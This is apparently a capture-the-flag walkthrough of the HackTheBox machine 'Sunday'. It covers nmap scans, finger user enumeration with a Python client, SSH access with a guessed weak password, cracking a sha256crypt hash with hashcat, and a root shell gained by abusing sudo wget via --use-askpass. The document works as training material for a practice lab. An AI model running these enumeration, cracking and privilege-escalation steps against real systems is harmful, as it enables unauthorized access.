Ping

Nmap Scans
mapit 10.10.10.76
Nmap Default Scan

Nmap Service and Script Scan

Nmap All Port Scan

Script and Service scan for Newly found ports

On Port 6787 https://10.10.10.76:6787

Will enumerate port 79 (finger). Check this page for background on the service and its enumeration: https://book.hacktricks.xyz/network-services-pentesting/pentesting-finger
finger @10.10.10.76
finger admin@10.10.10.76
finger root@10.10.10.76

Get the Perl script from https://github.com/pentestmonkey/finger-user-enum/blob/master/finger-user-enum.pl (saved here as finger.pl) to enumerate users over finger. -U takes the username list and -t the target host.
User Enumeration
perl finger.pl -U /usr/share/seclists/Usernames/Names/names.txt -t 10.10.10.76
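The finger protocol is simple enough to speak directly: open TCP/79, send the login name followed by CRLF (an empty name asks for the logged-in-user list) and read until the server closes the connection. The block below is an added example for this writeup, not pentestmonkey's script and not code from the original page. It pairs a raw finger client with a reply classifier so a wordlist can be enumerated the way finger-user-enum does; the sample replies are constructed (an assumption, modelled on Solaris finger output, where an unknown login is reported with "???" in the Name column and Linux fingerd answers "no such user") so the classifier can be exercised offline without the box.

```python
import socket

# Target and port taken from the writeup.
HOST = "10.10.10.76"
PORT = 79


def finger_query(user, host=HOST, port=PORT, timeout=5.0):
    """Send one finger request ('<user>\\r\\n', or a bare '\\r\\n' for the
    logged-in-user list) and return the raw reply as text."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(f"{user}\r\n".encode())
        chunks = []
        while True:
            data = sock.recv(4096)
            if not data:  # finger servers close the socket when done
                break
            chunks.append(data)
    return b"".join(chunks).decode(errors="replace")


def known_logins(reply):
    """Return the login names a finger reply vouches for (empty if none).

    Solaris prints a header line and then one row per match; a row whose
    Name column is '???' means the login does not exist. Linux fingerd
    instead prints 'finger: <name>: no such user.' (assumptions, modelled
    on typical output)."""
    lines = [ln for ln in reply.splitlines() if ln.strip()]
    if lines and lines[0].startswith("Login "):
        lines = lines[1:]  # drop the column header
    found = []
    for line in lines:
        fields = line.split()
        if "no such user" in line.lower() or len(fields) < 2 or fields[1] == "???":
            continue
        if fields[0] not in found:
            found.append(fields[0])
    return found


def enumerate_users(candidates, query=finger_query):
    """Query each candidate login and keep the ones the server knows."""
    hits = []
    for user in candidates:
        if user in known_logins(query(user)):
            hits.append(user)
    return hits


# Constructed sample replies (assumption: shaped like Solaris finger output).
HEADER = "Login       Name               TTY         Idle    When    Where\n"
SAMPLE_REPLIES = {
    "": HEADER + "sunny    sunny                 pts/3      <Apr 24 10:48>  10.10.14.4\n",
    "sunny": HEADER + "sunny    sunny                 pts/3      <Apr 24 10:48>  10.10.14.4\n",
    "sammy": HEADER + "sammy    sammy                 < .  .  .  . >\n",
    "admin": HEADER + "admin                 ???\n",
    "root": HEADER + "root     Super-User            console      <Oct 14 10:49>\n",
}


def fake_query(user):
    """Offline stand-in for finger_query using the constructed replies."""
    return SAMPLE_REPLIES.get(user, f"finger: {user}: no such user.\n")


if __name__ == "__main__":
    print("logged in:", known_logins(fake_query("")))
    print("valid:", enumerate_users(["sunny", "sammy", "admin", "root", "bob"], fake_query))
```

Against the real host, call enumerate_users with the lines of names.txt and the default query; the classifier is the part worth testing offline, since a wrong "???"/"no such user" rule silently turns every guess into a false positive or a false negative.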
Will try ssh to sunny
ssh sunny@10.10.10.76 -p 22022
Try the usual default and weak passwords first: the box name, admin, root, and the username as the password.
In this case the box name is the password: sunny:sunday
Will first read the shell history file

Will then check the backup file

We will try to crack sammy's password hash (it is a one-way hash, so it cannot be decrypted; we have to guess candidates and compare).
The hash type is sha256crypt (the $5$ prefix).
Will crack it with hashcat
hashcat --help | grep -i "sha256crypt"
Found the mode: sha256crypt is 7400
Will crack it now; sammy's hash is saved in a file named hash
hashcat -m 7400 hash /usr/share/wordlists/rockyou.txt --force
(--force only suppresses hashcat's warnings, e.g. about the OpenCL runtime; drop it once the drivers are set up.)
Found it! sammy:cooldude!
Will switch to sammy now
su sammy

On to privilege escalation
Will check our sudo privileges
sudo -l

We can execute wget with sudo as root. Will check GTFOBins for a way to escalate privileges with it: https://gtfobins.github.io/gtfobins/wget/#sudo (wget can also write arbitrary files with -O and read them with --post-file, so a sudo rule for wget is effectively root no matter which technique is used).

Will run this (the GTFOBins sudo technique). --use-askpass makes wget execute the given program to obtain credentials; under sudo that program runs as root, so we hand it a script that spawns a shell. wget captures the askpass program's stdout, so the script redirects stdout back to stdin (the terminal) with 1>&0 to get an interactive shell.
TF=$(mktemp)                                  # temp file for the askpass "program"
chmod +x $TF
echo -e '#!/bin/sh\n/bin/sh 1>&0' >$TF        # spawn a shell, stdout back to the tty
sudo wget --use-askpass=$TF 0                 # "0" is a throwaway URL; the askpass runs first
We are root! :)
Will get the flags now
user.txt

root.txt

Done with Sunday :)